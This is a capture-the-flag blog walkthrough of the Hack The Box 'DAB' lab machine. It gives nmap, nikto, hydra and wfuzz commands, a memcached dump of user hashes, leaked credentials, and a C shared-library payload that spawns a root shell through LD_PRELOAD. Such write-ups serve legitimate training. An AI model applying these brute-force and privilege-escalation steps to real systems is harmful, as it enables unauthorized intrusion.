DAB – HACK THE BOX

Hello, Hackers !!

In this blog post, we gonna solve the CTF Challenge DAB presented by Hack the box. DAB is a very interesting Challenge and its ratings seem good and also the level of difficulty is 7/8 out of 10.

Index

  • About Box
  • Enumeration
    • Port Scanning
    • Enumeration on port 80 (HTTP Service)
      • Brute Forcing Login
    • Enumeration on port 8080 (HTTP Service)
      • Cookies Brute Forcing
  • Exploiting SSH
  • Post Enumeration
  • Privilege Escalation
    • LD_PRELOAD

About Box

Level: Intermediate
OS: Linux
IP Address: 10.10.10.86

Lets get Start!!!

Enumeration

Let’s start with post scanning

Nmap Port Scanning

Command

nmap 10.10.10.86

(This will scan for top 1000 ports)

Nmap Aggressive and Service Version scan (to get more detailed information).

Command

nmap 10.10.10.86 -sV -A

Enumerating Port 80 (HTTP Service)

Now, Their is a HTTP service on port 80. when i visit, i found login page.

URL: http://10.10.10.86/login

Scanning port 80 with nikto tool.

Command

nikto -h 10.10.10.86

Tried some default credentials and some SQL tricks but no luck. after that I decided to brute-force the login with hydra.

Command

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.86 http-post-form '/login:username=^USER^&password=^PASS^&submit=Login:F=Error' -vV -t 50

and successfully got the user and pass.

Username: admin
Password: Password1

Time to get login. 🙂

nothing interesting 🙁

So, I just stop enumerating here and take a look on port 8080 which is another HTTP service port.

Enumeration on port 8080 (HTTP Service)

Lets try on port 8080.

URL: http://10.10.10.86:8080/

So, I used to brute-force cookie password with wfuzz.
(Note: you can use rockyou.txt also , in my case I just copied rockyou.txt in tmp as test.txt)

Cool now we have the cookie which we have to set.

It time to use burp.

the second aprt shows that we have successfully implemented the cookie.

Now the form ask to send some packet to and port.

Send packet to any internal port.

Here, I intercept a command.

Now the task here is to find the open ports in the network for that i am going to use Wfuzz again.


Command

wfuzz -c -z range,1-65535 --sc 200 "http://10.10.10.86:8080/socket?port=FUZZ&cmd=ping"

So, PORT: 22,80,8080,11211,37768,21 are open and from outside can’t access 11211,37768 lets try.

After a search i found that the port 11211 is used for Memcached and it we can get some details from it with commands.

here i found some commands: https://github.com/memcached/memcached/wiki/Commands

The interesting command i found here is stats slabs after trying that i got some cached info.

Now, I need to retrieve the cache-dump of the following slabs 16 and 26.

Stats cachedump command

Command : stats cachedump <slabs_id> <limit>\r\n

Parameters :

  • <slabs_id> : slab id from where you want to retrieve the keys
  • <limit> : result limit, 0 mean no limit

So i used the following command

stats cachedump 26 0

found an interesting Item users :).

lets see what this ITEM contains. (Note: It is necessary to logged in on port 80 (admin:Password1 #hydra) for this query)

Command

get users

found lots of users with their MD5 hash 🙂 🙂

cracked hashes with the help of hashcat and place users in a file and passwords in another file then used hydra to bruteforce on port 22 to gtet valid credentials.

Command

hydra -L users.txt -P password.txt 10.10.10.86 ssh -t 50

Successfully found credentials for ssh.

Exploiting

Let’s connect with SSH.

login: genevieve
password: Princess1

Command

ssh genevieve@10.10.10.8

here is the user.txt

Post Exploitation/ Privilege Escalation

Now, It’s time to escalate privileges and get root.txt

After enumerating. I found an interesting binary named myexec.

This Binary have setuid bit , Means if we can pwn this binary then get root privilege on the machine.
Command

find / -user root -perm -4000 -print 2>/dev/null | xargs ls -la

and write access to a library directory.

/etc/ld.so.conf.d

lets see what myexec has for us.

Command

file /usr/bin/myexec

Command

ltrace /usr/bin/myexe

Wow! we got the pass for the application.

Password: s3cur3l0gi

let’s try the application with the password.

this application needs a function named seclogin() which is missing.

Excalating Privilege using LD_PRELOAD

This can be beneficial for us 🙂 here write permission on ld.so.conf.d directory can be helpful for us. after some searches, I found a way to exploit with this write permission. here: http://touhidshaikh.com/blog/?p=827

So I created a C Program file which can be compile using GCC and if loaded with myexec can relate to privilege escalation.

genevieve@dab:/tmp$ cat libseclogin.c
include
include
include
void seclogin() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}

compiled with GCC compiled on DAB. place the file in the ld.so.conf.d.

Command

gcc -fPIC -shared -o libseclogin.so libseclogin.c -nostartfiles

updated the library, then execute myexec with the file compiled in ld.so.conf.d.

Command

genevieve@dab:/etc/ld.so.conf.d$ ldconfig /lib
genevieve@dab:/etc/ld.so.conf.d$ LD_PRELOAD="./libseclogin.so" /usr/bin/myexec

Congrats we are root ! 🙂

Thank you for reading. If you have any issue. just drop a comment below 😉

Leave a Reply

Your e-mail address will not be published. Required fields are marked *